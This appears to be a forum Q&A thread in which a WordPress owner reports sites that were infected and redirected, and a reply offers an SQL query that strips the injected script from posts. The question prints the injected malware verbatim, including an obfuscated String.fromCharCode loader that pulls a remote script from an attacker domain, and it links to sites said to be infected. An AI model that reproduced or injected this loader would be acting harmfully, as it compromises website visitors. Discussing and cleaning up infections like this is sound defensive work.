Wordpress website infected by virus; how to backup or recover?

Question

My WordPress websites are infected with malicious code. What can I do to regain data or backup? Websites are showing blank page or redirect to some malicious URL. The below code (and similar) were injected in many pages (also many files with different names were created) :

<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>

 

<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>

Some of my infected websites (warning: visiting may infect) :

https://lahuriyaconstruction.com/
https://getnonveg.com/

Answer 1

Same here - open your database in phpmyadmin and enter the following in SQL box:

UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%' 

It will clean all posts from the script, but you have to look where the entries come from.